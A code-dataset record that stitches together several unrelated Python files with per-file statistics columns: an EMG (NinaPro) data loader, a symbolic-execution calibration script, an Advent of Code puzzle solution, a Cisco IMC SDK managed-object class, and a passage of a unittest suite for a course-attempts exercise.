            'weights': weights,
            }
def import_subject(folder_path, subject, db, rest_length_cap=999):
    """Extract data from raw NinaPro files for DB1 or DB2.

    Args:
        folder_path (string): Path to folder containing raw mat files
        subject (int): Which subject's data to import (1-27 for DB1,
            1-40 for DB2)
        db (int): Which database to import from (1 or 2 currently)
        rest_length_cap (int, optional): The number of seconds of rest data
            to keep before/after a movement

    Returns:
        Dictionary: Raw EMG data, corresponding repetition and movement
        labels, indices of where repetitions are demarked and the number of
        repetitions with capped off rest data

    Raises:
        ValueError: If db is not 1 or 2.
    """
    if db == 1:
        fs = 100
        emg, rep, move = _load_db1(folder_path, subject)
    elif db == 2:
        fs = 2000
        emg, rep, move = _load_db2(folder_path, subject)
    else:
        raise ValueError('db should be either 1 for database 1 or 2 for database 2')
    # Label repetitions using new block style: rest-move-rest regions
    rep, rep_regions, nb_capped = _label_repetitions(emg, rep, move,
                                                     rest_length_cap, fs)
    return {'emg': emg,
            'rep': rep,
            'move': move,
            'rep_regions': rep_regions,
            'nb_capped': nb_capped
            }


def _load_db1(folder_path, subject):
    """Load and concatenate the three DB1 exercise files for one subject."""
    emg = rep = move = None
    for exercise in (1, 2, 3):
        cur_path = os.path.normpath(folder_path + '/S' + str(subject) +
                                    '_A1_E' + str(exercise) + '.mat')
        data = sio.loadmat(cur_path)
        if emg is None:
            emg = np.squeeze(np.array(data['emg']))
            rep = np.squeeze(np.array(data['rerepetition']))
            move = np.squeeze(np.array(data['restimulus']))
        else:
            emg = np.vstack((emg, np.array(data['emg'])))
            rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
            # Movement labels restart in each file; offset the non-rest
            # labels so they continue from the previous exercise's numbering
            move_tmp = np.squeeze(np.array(data['restimulus']))
            move_tmp[move_tmp != 0] += max(move)
            move = np.append(move, move_tmp)
    return emg, rep, move.astype('int8')  # int8 to minimise overhead


def _load_db2(folder_path, subject):
    """Load and concatenate the three DB2 exercise files for one subject."""
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E1_A1.mat')
    data = sio.loadmat(cur_path)
    emg = np.squeeze(np.array(data['emg']))
    rep = np.squeeze(np.array(data['rerepetition']))
    move = np.squeeze(np.array(data['restimulus']))
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E2_A1.mat')
    data = sio.loadmat(cur_path)
    emg = np.vstack((emg, np.array(data['emg'])))
    rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
    move_tmp = np.squeeze(np.array(data['restimulus']))
    move = np.append(move, move_tmp)  # Note no numbering fix needed for this exercise
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E3_A1.mat')
    data = sio.loadmat(cur_path)
    emg = np.vstack((emg, np.array(data['emg'])))
    # Note that for the last file there is no 'rerepetition' or 'restimulus'
    data['repetition'][-1] = 0  # Fix for diffing
    rep = np.append(rep, np.squeeze(np.array(data['repetition'])))
    # Movements are numbered in a non-logical pattern [0 1 2 4 6 8 9 16 32 40];
    # remap onto 41-49 so they follow on from exercises 1 and 2
    data['stimulus'][-1] = 0  # Fix for diffing
    for raw_label, new_label in zip((1, 2, 4, 6, 8, 9, 16, 32, 40),
                                    range(41, 50)):
        data['stimulus'][np.where(data['stimulus'] == raw_label)] = new_label
    move_tmp = np.squeeze(np.array(data['stimulus']))
    move = np.append(move, move_tmp)
    return emg, rep, move.astype('int8')  # int8 to minimise overhead


def _label_repetitions(emg, rep, move, rest_length_cap, fs):
    """Relabel repetitions as rest-move-rest blocks with capped rest periods.

    Each repetition block runs from the midpoint of the preceding rest region
    to the midpoint of the following one; rest longer than rest_length_cap
    seconds on either side of a movement is left labelled 0 (unassigned).

    Returns:
        Tuple: (rep, rep_regions, nb_capped) where rep is the new per-sample
        repetition label array, rep_regions holds the start/end index of each
        block and nb_capped counts how many rest regions were capped.
    """
    move_regions = np.where(np.diff(move))[0]
    rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
    nb_reps = int(round(move_regions.shape[0] / 2))
    last_end_idx = int(round(move_regions[0] / 2))
    nb_unique_reps = np.unique(rep).shape[0] - 1  # To account for 0 regions
    nb_capped = 0
    cur_rep = 1
    rep = np.zeros([rep.shape[0], ], dtype=np.int8)  # Reset rep array
    for i in range(nb_reps - 1):
        rep_regions[2 * i] = last_end_idx
        # Midpoint of the rest region between this movement and the next
        midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
                                  move_regions[2 * (i + 1)]) / 2)) + 1
        trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
        if trailing_rest_samps <= rest_length_cap * fs:
            # Short rest: the block extends to the rest midpoint
            rep[last_end_idx:midpoint_idx] = cur_rep
            last_end_idx = midpoint_idx
            rep_regions[2 * i + 1] = midpoint_idx - 1
        else:
            # Long rest: keep only rest_length_cap seconds on each side,
            # leaving the middle of the rest region labelled 0
            rep_end_idx = (move_regions[2 * (i + 1) - 1] +
                           int(round(rest_length_cap * fs)))
            rep[last_end_idx:rep_end_idx] = cur_rep
            last_end_idx = (move_regions[2 * (i + 1)] -
                            int(round(rest_length_cap * fs)))
            rep_regions[2 * i + 1] = rep_end_idx - 1
            nb_capped += 2
        cur_rep += 1
        if cur_rep > nb_unique_reps:
            cur_rep = 1
    # Close the final block halfway into the trailing rest
    end_idx = int(round((emg.shape[0] + move_regions[-1]) / 2))
    rep[last_end_idx:end_idx] = cur_rep
    rep_regions[-2] = last_end_idx
    rep_regions[-1] = end_idx - 1
    return rep, rep_regions, nb_capped
| 42.334768
| 119
| 0.568557
| 7,148
| 49,193
| 3.745803
| 0.064773
| 0.033987
| 0.02465
| 0.018301
| 0.825845
| 0.821923
| 0.788945
| 0.787339
| 0.78465
| 0.778711
| 0
| 0.083878
| 0.29742
| 49,193
| 1,161
| 120
| 42.371232
| 0.690817
| 0.183563
| 0
| 0.805128
| 0
| 0
| 0.065831
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021795
| false
| 0
| 0.016667
| 0
| 0.060256
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fba5644ae7488d95bde127cddafbc5b955537ea9
| 1,477
|
py
|
Python
|
Chef/calibrate/default.py
|
dslab-epfl/chef-symbex-python
|
598d18ae2fe7f3af78489442e11b4505b001ddd3
|
[
"PSF-2.0"
] | 7
|
2015-05-20T11:45:39.000Z
|
2021-04-18T19:32:34.000Z
|
Chef/calibrate/default.py
|
dslab-epfl/chef-symbex-python
|
598d18ae2fe7f3af78489442e11b4505b001ddd3
|
[
"PSF-2.0"
] | null | null | null |
Chef/calibrate/default.py
|
dslab-epfl/chef-symbex-python
|
598d18ae2fe7f3af78489442e11b4505b001ddd3
|
[
"PSF-2.0"
] | 1
|
2015-08-04T14:34:28.000Z
|
2015-08-04T14:34:28.000Z
|
#!/usr/bin/env python
#
from chef import symbex
def calibrate():
    """Run a fixed straight-line arithmetic workload between symbex probes.

    NOTE(review): the 15 identical four-assignment blocks appear to be
    deliberately unrolled so that each symbex.calibrate(1, 5) probe brackets
    an identical, known amount of straight-line bytecode - do not refactor
    into a loop without confirming against the Chef/symbex calibration docs.
    """
    x = 0
    y = 1
    symbex.calibrate(1, 0)
    # 15 identical probe blocks follow
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
    x = x + y
    y = x + y
    x = x * 2
    y = y / 2
    symbex.calibrate(1, 5)
def main():
    """Wrap the calibration workload in symbex probe markers."""
    symbex.calibrate(0)  # presumably starts a calibration session - TODO confirm
    calibrate()
    symbex.calibrate(2)  # presumably ends the session - TODO confirm


if __name__ == "__main__":
    main()
| 15.547368
| 26
| 0.387949
| 271
| 1,477
| 2.084871
| 0.070111
| 0.106195
| 0.453097
| 0.106195
| 0.769912
| 0.769912
| 0.769912
| 0.769912
| 0.769912
| 0.769912
| 0
| 0.083969
| 0.46784
| 1,477
| 94
| 27
| 15.712766
| 0.63486
| 0.013541
| 0
| 0.872093
| 0
| 0
| 0.005498
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.011628
| 0
| 0.034884
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fbc86afae91c13fecee89d212f7e0dbda819d2a7
| 5,956
|
py
|
Python
|
2016/day_10/python/day10.py
|
josephroquedev/advent-of-code
|
bb217deb7a5f5ed5c8c04cb726ddadb5b042ee4d
|
[
"MIT"
] | null | null | null |
2016/day_10/python/day10.py
|
josephroquedev/advent-of-code
|
bb217deb7a5f5ed5c8c04cb726ddadb5b042ee4d
|
[
"MIT"
] | 2
|
2021-06-02T00:41:38.000Z
|
2021-11-30T10:05:29.000Z
|
2016/day_10/python/day10.py
|
autoreleasefool/advent-of-code
|
bb217deb7a5f5ed5c8c04cb726ddadb5b042ee4d
|
[
"MIT"
] | null | null | null |
from aoc import AOC
import re
aoc = AOC(year=2016, day=10)
data = aoc.load()
## Part 1
class Bot:
    """One bot's routing rules and its currently-held chip (part 1).

    Also reports the puzzle answer when the 61/17 comparison occurs.
    """

    def __init__(self, number, gives_lower_to_output, lower_to_number,
                 gives_higher_to_output, higher_to_number, chip_number):
        self.number = number
        # Each route is a (goes_to_output_bin?, destination_number) pair
        self.on_lower_chip = (gives_lower_to_output, lower_to_number)
        self.on_higher_chip = (gives_higher_to_output, higher_to_number)
        self.chip_number = chip_number

    def receive_chip(self, chip_number):
        """Accept a chip; once two are held, hand both off.

        Returns None while only one chip is held, otherwise a 6-tuple of
        lower route + lower chip followed by higher route + higher chip.
        """
        if self.chip_number is None:
            self.chip_number = chip_number
            return None
        held = self.chip_number
        # Part 1 answer: the bot that compares chips 61 and 17
        if {held, chip_number} == {17, 61}:
            aoc.p1(self.number)
        self.chip_number = None
        low, high = sorted((held, chip_number))
        return self.on_lower_chip + (low,) + self.on_higher_chip + (high,)
# Regular expressions to parse bot setup
re_instruction = re.compile(
    r"bot (\d+) gives low to (bot|output) (\d+) and high to (bot|output) (\d+)"
)
re_initial_chip = re.compile(r"value (\d+) goes to bot (\d+)")
bots = {}           # bot number -> Bot
output_bins = {}    # output bin number -> list of chips received
chips_to_pass = []  # stack of (to_output_bin?, destination, chip) hand-offs
for line in data.lines():
    if line[0] == "b":  # Passing instructions
        # Get instructions for bot to pass chips
        instruction = re_instruction.match(line)
        bot_number = int(instruction.group(1))
        lower_to_output = instruction.group(2) == "output"
        lower_goes_to = int(instruction.group(3))
        higher_to_output = instruction.group(4) == "output"
        higher_goes_to = int(instruction.group(5))
        # Construct the bot with the given info
        bots[bot_number] = Bot(
            bot_number,
            lower_to_output,
            lower_goes_to,
            higher_to_output,
            higher_goes_to,
            None,
        )
    else:  # Initial chip
        # Get the bot's starting chip
        initial_chip = re_initial_chip.match(line)
        start_chip = int(initial_chip.group(1))
        bot_number = int(initial_chip.group(2))
        chips_to_pass.append((False, bot_number, start_chip))
# Iterate over all chips being handled
while chips_to_pass:
    to_pass = chips_to_pass.pop()
    if to_pass[0]:  # Pass to output bin
        output_bin = to_pass[1]
        chip = to_pass[2]
        if output_bin in output_bins:
            output_bins[output_bin].append(chip)
        else:
            output_bins[output_bin] = [chip]
    else:  # Pass to other bot
        bot = to_pass[1]
        chip = to_pass[2]
        result = bots[bot].receive_chip(chip)
        if result is not None:
            # When bots have 2 chips, they give out their chips
            chips_to_pass.append((result[0], result[1], result[2]))
            chips_to_pass.append((result[3], result[4], result[5]))
## Part 2
class Bot:
    """Routing rules plus the chip a bot is currently holding (part 2)."""

    def __init__(self, number, gives_lower_to_output, lower_to_number,
                 gives_higher_to_output, higher_to_number, chip_number):
        self.number = number
        # Each route is a (goes_to_output_bin?, destination_number) pair
        self.on_lower_chip = (gives_lower_to_output, lower_to_number)
        self.on_higher_chip = (gives_higher_to_output, higher_to_number)
        self.chip_number = chip_number

    def receive_chip(self, chip_number):
        """Take a chip; with two in hand, hand both off.

        Returns None while holding a single chip, otherwise a 6-tuple:
        lower route + lower chip followed by higher route + higher chip.
        """
        if self.chip_number is None:
            self.chip_number = chip_number
            return None
        first = self.chip_number
        self.chip_number = None
        low, high = sorted((first, chip_number))
        return self.on_lower_chip + (low,) + self.on_higher_chip + (high,)
# Regular expressions to parse bot setup (same grammar as part 1)
re_instruction = re.compile(
    "bot (\\d+) gives low to (bot|output) (\\d+) and high to (bot|output) (\\d+)"
)
re_initial_chip = re.compile("value (\\d+) goes to bot (\\d+)")
bots = {}           # bot number -> Bot
output_bins = {}    # output bin number -> list of chips received
chips_to_pass = []  # stack of (to_output_bin?, destination, chip) hand-offs
for line in data.lines():
    if line[0] == "b":  # Passing instructions
        # Get instructions for bot to pass chips
        instruction = re_instruction.match(line)
        bot_number = int(instruction.group(1))
        lower_to_output = instruction.group(2) == "output"
        lower_goes_to = int(instruction.group(3))
        higher_to_output = instruction.group(4) == "output"
        higher_goes_to = int(instruction.group(5))
        # Construct the bot with the given info
        bots[bot_number] = Bot(
            bot_number,
            lower_to_output,
            lower_goes_to,
            higher_to_output,
            higher_goes_to,
            None,
        )
    else:  # Initial chip
        # Get the bot's starting chip
        initial_chip = re_initial_chip.match(line)
        start_chip = int(initial_chip.group(1))
        bot_number = int(initial_chip.group(2))
        chips_to_pass.append((False, bot_number, start_chip))
# Iterate over all chips being handled
while chips_to_pass:
    to_pass = chips_to_pass.pop()
    if to_pass[0]:  # Pass to output bin
        output_bin = to_pass[1]
        chip = to_pass[2]
        if output_bin in output_bins:
            output_bins[output_bin].append(chip)
        else:
            output_bins[output_bin] = [chip]
    else:  # Pass to other bot
        bot = to_pass[1]
        chip = to_pass[2]
        result = bots[bot].receive_chip(chip)
        if result is not None:
            # When bots have 2 chips, they give out their chips
            chips_to_pass.append((result[0], result[1], result[2]))
            chips_to_pass.append((result[3], result[4], result[5]))
# Part 2 answer: product of the first chip in output bins 0, 1 and 2
aoc.p2(output_bins[0][0] * output_bins[1][0] * output_bins[2][0])
| 30.860104
| 88
| 0.61904
| 826
| 5,956
| 4.193705
| 0.125908
| 0.080831
| 0.064665
| 0.04157
| 0.920901
| 0.920901
| 0.920901
| 0.920901
| 0.920901
| 0.920901
| 0
| 0.014964
| 0.281901
| 5,956
| 192
| 89
| 31.020833
| 0.79495
| 0.128946
| 0
| 0.886525
| 0
| 0.014184
| 0.045173
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028369
| false
| 0.156028
| 0.014184
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
8389b4cfa0fcd43b4556aed089ff2090e1226ba0
| 7,390
|
py
|
Python
|
imcsdk/mometa/comm/CommSavedVMediaMap.py
|
vadimkuznetsov/imcsdk
|
ed038ce1dbc8031f99d2dfb3ccee3bf0b48309d8
|
[
"Apache-2.0"
] | null | null | null |
imcsdk/mometa/comm/CommSavedVMediaMap.py
|
vadimkuznetsov/imcsdk
|
ed038ce1dbc8031f99d2dfb3ccee3bf0b48309d8
|
[
"Apache-2.0"
] | null | null | null |
imcsdk/mometa/comm/CommSavedVMediaMap.py
|
vadimkuznetsov/imcsdk
|
ed038ce1dbc8031f99d2dfb3ccee3bf0b48309d8
|
[
"Apache-2.0"
] | 1
|
2019-11-10T18:42:04.000Z
|
2019-11-10T18:42:04.000Z
|
"""This module contains the general information for CommSavedVMediaMap ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class CommSavedVMediaMapConsts:
    """Allowed string constants for CommSavedVMediaMap properties."""
    # adminAction values
    ADMIN_ACTION_DELETE_VOLUME = "delete-volume"
    ADMIN_ACTION_REMAP_VOLUME = "remap-volume"
    # driveType values
    DRIVE_TYPE_CD = "cd"
    DRIVE_TYPE_FLOPPY = "floppy"
    # map (mount protocol) values
    MAP_CIFS = "cifs"
    MAP_NFS = "nfs"
    MAP_WWW = "www"
class CommSavedVMediaMap(ManagedObject):
"""This is CommSavedVMediaMap class."""
consts = CommSavedVMediaMapConsts()
naming_props = set([u'volumeName'])
mo_meta = {
"classic": MoMeta("CommSavedVMediaMap", "commSavedVMediaMap", "saved-vmmap-[volume_name]", VersionMeta.Version301c, "InputOutput", 0x3f, [], ["admin", "read-only", "user"], [u'commVMedia'], [], ["Get", "Remove", "Set"]),
"modular": MoMeta("CommSavedVMediaMap", "commSavedVMediaMap", "saved-vmmap-[volume_name]", VersionMeta.Version301c, "InputOutput", 0x3f, [], ["admin", "read-only", "user"], [u'commVMedia'], [], ["Get", "Remove", "Set"])
}
prop_meta = {
"classic": {
"admin_action": MoPropertyMeta("admin_action", "adminAction", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x2, 0, 510, None, ["delete-volume", "remap-volume"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version301c, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"drive_type": MoPropertyMeta("drive_type", "driveType", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, ["cd", "floppy"], []),
"map": MoPropertyMeta("map", "map", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, ["cifs", "nfs", "www"], []),
"mount_options": MoPropertyMeta("mount_options", "mountOptions", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, 1, 248, None, [], []),
"password": MoPropertyMeta("password", "password", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"remote_file": MoPropertyMeta("remote_file", "remoteFile", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{1,235}""", [], []),
"remote_share": MoPropertyMeta("remote_share", "remoteShare", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{1,235}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"username": MoPropertyMeta("username", "username", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"volume_name": MoPropertyMeta("volume_name", "volumeName", "string", VersionMeta.Version301c, MoPropertyMeta.NAMING, 0x20, None, None, r"""[\-\.:_a-zA-Z0-9]{1,47}""", [], []),
},
"modular": {
"admin_action": MoPropertyMeta("admin_action", "adminAction", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x2, 0, 510, None, ["delete-volume", "remap-volume"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version301c, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"drive_type": MoPropertyMeta("drive_type", "driveType", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, ["cd", "floppy"], []),
"map": MoPropertyMeta("map", "map", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, ["cifs", "nfs", "www"], []),
"mount_options": MoPropertyMeta("mount_options", "mountOptions", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, 1, 248, None, [], []),
"password": MoPropertyMeta("password", "password", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"remote_file": MoPropertyMeta("remote_file", "remoteFile", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{1,235}""", [], []),
"remote_share": MoPropertyMeta("remote_share", "remoteShare", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{1,235}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"username": MoPropertyMeta("username", "username", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"volume_name": MoPropertyMeta("volume_name", "volumeName", "string", VersionMeta.Version301c, MoPropertyMeta.NAMING, 0x20, None, None, r"""[\-\.:_a-zA-Z0-9]{1,47}""", [], []),
},
}
prop_map = {
"classic": {
"adminAction": "admin_action",
"childAction": "child_action",
"dn": "dn",
"driveType": "drive_type",
"map": "map",
"mountOptions": "mount_options",
"password": "password",
"remoteFile": "remote_file",
"remoteShare": "remote_share",
"rn": "rn",
"status": "status",
"username": "username",
"volumeName": "volume_name",
},
"modular": {
"adminAction": "admin_action",
"childAction": "child_action",
"dn": "dn",
"driveType": "drive_type",
"map": "map",
"mountOptions": "mount_options",
"password": "password",
"remoteFile": "remote_file",
"remoteShare": "remote_share",
"rn": "rn",
"status": "status",
"username": "username",
"volumeName": "volume_name",
},
}
def __init__(self, parent_mo_or_dn, volume_name, **kwargs):
    """Create a CommSavedVMediaMap managed object.

    Args:
        parent_mo_or_dn: parent managed object, or its distinguished name.
        volume_name: naming property identifying this saved vmedia map.
        **kwargs: optional initial values for the remaining properties,
            forwarded to ``ManagedObject.__init__``.
    """
    self._dirty_mask = 0
    self.volume_name = volume_name
    # Every non-naming property starts out unset; the server (or the
    # caller, via kwargs) fills them in later.
    for prop_name in ("admin_action", "child_action", "drive_type", "map",
                      "mount_options", "password", "remote_file",
                      "remote_share", "status", "username"):
        setattr(self, prop_name, None)
    ManagedObject.__init__(self, "CommSavedVMediaMap", parent_mo_or_dn, **kwargs)
| 62.627119
| 228
| 0.60406
| 699
| 7,390
| 6.223176
| 0.151645
| 0.08092
| 0.167356
| 0.251034
| 0.812414
| 0.812414
| 0.812414
| 0.812414
| 0.812414
| 0.812414
| 0
| 0.030334
| 0.201489
| 7,390
| 117
| 229
| 63.162393
| 0.706829
| 0.015697
| 0
| 0.583333
| 0
| 0
| 0.271964
| 0.042413
| 0
| 0
| 0.005784
| 0
| 0
| 1
| 0.010417
| false
| 0.052083
| 0.03125
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
f7ddc3dba348063a9525289f18d2ba16a3439900
| 12,531
|
py
|
Python
|
advanced/part12-11_attempted_courses/test/test_attempted_courses.py
|
Hannah-Abi/python-pro-21
|
2ce32c4bf118054329d19afdf83c50561be1ada8
|
[
"MIT"
] | null | null | null |
advanced/part12-11_attempted_courses/test/test_attempted_courses.py
|
Hannah-Abi/python-pro-21
|
2ce32c4bf118054329d19afdf83c50561be1ada8
|
[
"MIT"
] | null | null | null |
advanced/part12-11_attempted_courses/test/test_attempted_courses.py
|
Hannah-Abi/python-pro-21
|
2ce32c4bf118054329d19afdf83c50561be1ada8
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import patch
from tmc import points, reflect
from tmc.utils import load, load_module, reload_module, get_stdout, check_source, sanitize
from functools import reduce
import os
import os.path
import textwrap
from random import choice, randint
from datetime import date, datetime, timedelta
# Dotted module path of the student's solution that this suite tests.
exercise = 'src.attempted_courses'
def f(attr: list):
    """Join a list of strings into one comma-separated string."""
    separator = ","
    return separator.join(attr)
def s(response):
    """Render each item of *response* on its own line, trailing newline included."""
    return "".join(item + "\n" for item in response)
class AttemptedCoursesTest(unittest.TestCase):
    """TMC test suite for the attempted_courses exercise.

    Part 1 checks ``names_of_students(attempts)`` and part 2 checks
    ``course_names(attempts)``; both functions must be implemented with
    ``map``.  Fixes over the previous revision: deprecated ``assertEquals``
    replaced with ``assertEqual``, the fragile ``map(None, [])`` type probe
    replaced with ``isinstance``, and the code snippets shown in failure
    messages now match the function actually being tested ("retunrn" /
    "course_namet" typos corrected as well).
    """

    @classmethod
    def setUpClass(cls):
        # Loading the student's module must not prompt for input.
        with patch('builtins.input', side_effect=[AssertionError("Input was not expected")]):
            cls.module = load_module(exercise, 'fi')

    def test_0a_main_ok(self):
        # Loose test code in the solution must live inside the __main__ guard.
        ok, line = check_source(self.module)
        message = """Code testing the functions must be located after the
if __name__ == "__main__":
block. The following line must be moved:
"""
        self.assertTrue(ok, message + line)

    @points('12.attempted_courses_part1')
    def test_01_function_names_of_students_exists(self):
        try:
            from src.attempted_courses import names_of_students
        except:  # bare except on purpose: any failure in the student's module must fail the test
            self.fail("Your program should have a function called names_of_students(attempts: list)")

    @points('12.attempted_courses_part1')
    def test_02_course_names_return_type(self):
        from src.attempted_courses import names_of_students
        from src.attempted_courses import CourseAttempt
        code = """
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
names_of_students([s1, s2, s3])
"""
        try:
            s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
            s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
            s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
            response = names_of_students([s1, s2, s3])
        except:
            self.fail(f"Check that the following code can be executed\n{code}")
        taip = str(type(response)).replace("<class '", "").replace("'>", "")
        self.assertTrue(isinstance(response, (map, list)), f"Function names_of_students(students: list) should return map or list, now the return value was of type {taip}")
        for alkio in response:
            etaip = str(type("")).replace("<class '", "").replace("'>", "")
            taip = str(type(alkio)).replace("<class '", "").replace("'>", "")
            self.assertTrue(isinstance(alkio, str), f"When this code is executed {code}the values returned should be of type {etaip} now the type is {taip}")

    @points('12.attempted_courses_part1')
    def test_03_names_of_students_works_1(self):
        from src.attempted_courses import names_of_students
        from src.attempted_courses import CourseAttempt
        code = """
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
names_of_students([s1, s2, s3])
"""
        try:
            s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
            s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
            s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
            response = names_of_students([s1, s2, s3])
        except:
            self.fail(f"Check that the following code can be executed\n{code}")
        # Expected: one student name per attempt, order not significant.
        exp = [attempt.student_name for attempt in [s1, s2, s3]]
        output = ""
        vast = []
        for n in response:
            output += n + "\n"
            vast.append(n)
        self.assertEqual(sorted(vast), sorted(exp), f"When this code is executed {code}it should return \n{s(exp)}\nnow the function returns\n{output}")

    @points('12.attempted_courses_part1')
    def test_04_names_of_students_map_used(self):
        # Slice the body of names_of_students out of the source file and
        # require that it mentions map.
        src_file = os.path.join('src', 'attempted_courses.py')
        lines = []
        inside = False
        with open(src_file) as source:
            for line in source:
                if "def names_of_students" in line:
                    inside = True
                elif inside and ('__name__ == "__main__":' in line or "def names_of_students" in line):
                    inside = False
                elif inside:
                    lines.append(line)
        uses_map = any("map" in line for line in lines)
